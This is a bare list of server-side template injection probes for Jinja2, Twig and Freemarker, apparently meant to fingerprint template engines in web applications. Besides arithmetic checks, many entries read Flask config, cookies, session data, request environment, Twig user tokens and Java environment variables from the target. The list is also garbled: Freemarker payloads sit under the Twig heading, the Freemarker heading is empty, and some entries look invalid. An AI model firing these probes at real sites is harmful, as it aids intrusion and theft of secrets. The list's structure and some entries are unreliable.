SSTI Engine detection list

Jinja2 Detection List

{{7*7}}
{{7*'7'}}
{{config}}
{{self}}
{{request}}
{{lipsum}}
{{cycler}}
{{joiner}}
{{namespace}}
{{7**7}}
{{[].__class__}}
{{''.__class__.__mro__}}
{{().__class__.__mro__}}
{{dict.__class__.__mro__}}
{{request.application}}
{{self.__dict__}}
{{lipsum.__globals__}}
{{cycler.__init__}}
{{joiner.__init__}}
{{namespace.__init__}}
{{config.items()}}
{{config.__dict__}}
{{config.from_envvar}}
{{config.from_object}}
{{config.from_pyfile}}
{{url_for.__globals__}}
{{get_flashed_messages.__globals__}}
{{session.items()}}
{{g.items()}}
{{request.cookies}}
{{request.headers}}
{{request.args}}
{{request.form}}
{{request.values}}
{{request.json}}
{{request.files}}
{{request.environ}}
{{request.environ['PATH_INFO']}}
{{request.environ['QUERY_STRING']}}
{{request.environ['SERVER_NAME']}}
{{request.environ['SERVER_PORT']}}
{{request.environ['REMOTE_ADDR']}}
{{request.environ['HTTP_USER_AGENT']}}
{{request.environ['HTTP_HOST']}}
{{request.environ['HTTP_REFERER']}}
{{request.environ['HTTP_COOKIE']}}

Twig (PHP) Detectoin List

{{7*7}}
{{7*'7'}}
{{_self}}
{{_self.env}}
{{app}}
{{dump(app)}}
{{constant('PHP_VERSION')}}
{{'7'~'7'}}
{{['a','b']|join}}
{{_context}}
{{_charset}}
{{_self.getTemplateName()}}
{{_self.getEnvironment()}}
{{_self.getGlobals()}}
{{app.request}}
{{app.session}}
{{app.security}}
{{app.user}}
{{app.debug}}
{{app.environment}}
{{app.version}}
{{app.getRequest()}}
{{app.getSession()}}
{{app.getUser()}}
{{app.getToken()}}
{{app.getRoles()}}
{{app.isGranted('ROLE_ADMIN')}}
{{_self.env.getFilters()|keys}}
{{_self.env.getFunctions()|keys}}
{{_self.env.getTests()|keys}}
{{_self.env.getExtensions()|keys}}
{{_self.env.getLoader()}}
{{_self.env.getCache()}}
{{_self.env.getCharset()}}
{{_self.env.getTemplateClassPrefix()}}
{{_self.env.isDebug()}}
{{_self.env.isAutoReload()}}
{{_self.env.isStrictVariables()}}
{{_self.env.getTemplateClass('index')}}
{{_self.env.getTemplate('index')}}
{{_self.env.loadTemplate('index')}}
{{_self.env.compileSource('source')}}
{{_self.env.render('template', {})}}
{{_self.env.display('template', {})}}
{{_self.env.resolveTemplate('names')}}
{{_self.env.isSandboxed()}}
{{_self.env.getSandbox()}}
{{_self.env.getPolicy()}}${7*7}
#{7*7}
${.version}
${.now}
${.main}
${.data_model}
${.locale}
${.template}
${.output_encoding}
${.url_escaping_charset}
${.time_zone}
${.current_template_name}
${1?string.sequence}
${1?string.currency}
${1?string.percent}
${.lang}
${.locale}
${.number_format}
${.boolean_format}
${.date_format}
${.time_format}
${.datetime_format}
${.template_config}
${.template_config.getTemplateUpdateDelay()}
${.template_config.getTemplateLoader()}
${.template_config.getObjectWrapper()}
${.template_config.getLocale()}
${.template_config.getTimeZone()}
${.template_config.getNumberFormat()}
${.template_config.getBooleanFormat()}
${.template_config.getDateFormat()}
${.template_config.getTimeFormat()}
${.template_config.getDateTimeFormat()}
${.template_config.getOutputEncoding()}
${.template_config.getURLEscapingCharset()}
${.template_config.getWhitespaceStripping()}
${.template_config.getCacheStorage()}
${.template_config.getTemplateLookupStrategy()}
${.template_config.getTemplateNameFormat()}
${.template_config.getAPIBuiltinEnabled()}
${.template_config.getIncompatibleImprovements()}
${statics['java.lang.System'].getProperty('os.name')}
${statics['java.lang.System'].getProperty('user.home')}
${statics['java.lang.System'].getProperty('java.version')}
${statics['java.lang.System'].getenv('PATH')}
${statics['java.lang.Runtime'].getRuntime().availableProcessors()}
${.globals}
${.vars}
${.namespace}
${.current_template_name}
${.template_name}
${.template_src}
${.template_encoding}
${.template_exists('index')?string('yes','no')}
${.getTemplate('index')}
${.getResource('index')}
${.getClass().getResource('/')}
${.getClass().getClassLoader()}
{{_self.env.getRuntime('core')}}
{{_self.env.getRuntime('security')}}
{{_self.env.getRuntime('cache')}}
{{_self.env.getRuntime('escaped')}}
{{_self.env.getRuntime('sandbox')}}


Freemarker (Java) Detection List



